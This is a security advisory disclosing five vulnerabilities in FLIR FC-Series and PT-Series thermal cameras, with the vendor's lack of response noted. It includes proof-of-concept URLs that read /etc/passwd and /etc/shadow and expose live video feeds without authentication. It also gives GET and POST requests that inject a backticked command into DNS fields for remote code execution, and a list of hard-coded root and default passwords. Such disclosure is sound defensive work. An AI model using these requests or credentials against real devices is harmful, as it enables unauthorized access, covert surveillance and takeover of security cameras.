SSD Advisory – FLIR Systems Multiple Vulnerabilities

Vulnerabilities Summary
The following advisory describes 5 (five) vulnerabilities found in FLIR Systems FLIR Thermal/Infrared Camera FC-Series S, FC-Series ID, PT-Series.
FLIR – “Best-in-class thermal cameras with on-board analytics for high-performance intrusion detection. The new FC-Series ID combines best-in-class thermal image detail and high-performance edge perimeter analytics together in a single device that delivers optimal intrusion detection in challenging environments and extreme conditions”.
The vulnerabilities found are:

  • Information disclosure
  • Stream disclosure
  • Unauthenticated Remote Code Execution
  • Authenticated Remote Code Execution
  • Hard-coded Credentials

Credit
An independent security researcher, Gjoko Krstic – Zero Science Lab, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor Response
The vendor has been notified on the 27th of June 2017, several emails were exchanged, but no ETA for a fix or workaround have been provided for the following vulnerabilities.

Vulnerabilities details
Information Disclosure (1)
The FLIR web-server webroot/js/fns.login.js provides API functionality. By using the following API calls an attacker can download and read files from the FLIR OS:

  • /api/xml?file=PATH-TO-FILE
  • /api/file/download/PATH-TO-FILE
  • /api/file/content/PATH-TO-FILE
  • /api/server/videosnap?file=PATH-TO-FILE
  • /page/maintenance/view/server-lan
  • /api/file/ini/read
  • /api/system/config/product

Proof of Concept

http://IP/api/xml?file=/etc/passwd
http://IP/api/xml?file=/etc/shadow
http://IP:8081/api/file/download/etc/shadow
http://IP:8081/api/file/download/etc/passwd
http://IP:8081/api/file/content/var/log/messages
http://IP:8081/api/server/videosnap?file=../../../../../../etc/passwd
http://IP:8081/page/maintenance/view/server-lan
http://IP/api/file/ini/read
http://IP:8081/api/system/config/product

Stream Disclosure
FLIR web-server does not validate if the user is authenticated when asked to show the live feed.
Proof of Concept
An attacker can get the live stream by sending sending the the following request:

http://IP:8081/graphics/livevideo/stream/stream3.jpg
http://IP/graphics/livevideo/stream/stream1.jpg

Unauthenticated Remote Code Execution
User controlled input is not sufficiently sanitized and can be exploit by an attacker to execute command on the machine.
By sending GET request to /maintenance/controllerFlirSystem.php an attacker can trigger the vulnerability.
Proof of Concept

GET /maintenance/controllerFlirSystem.php?dns%5Bdhcp%5D=%60COMMAND-TO-EXECUTE%60&dns%5Bserver1%5D=1.2.3.4&dns%5Bserver2%5D=&_=1491052263282 HTTP/1.1

Authenticated Remote Code Execution
User controlled input is not sufficiently sanitized and can be exploit by an attacker to execute command on the machine.
By sending POST request to //page/maintenance/lanSettings/dns an attacker can trigger the vulnerability.
Proof of Concept

POST /page/maintenance/lanSettings/dns HTTP/1.1
Host: TARGET:8081
Content-Length: 64
Accept: */*
Origin: http://TARGET:8081
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://TARGET:8081/maintenance
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
DNT: 1
Connection: close
dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60COMMAND-TO-EXECUTE%60

Hard-coded Credentials

root:indigo
root:video
default:video
default:[blank]
ftp:video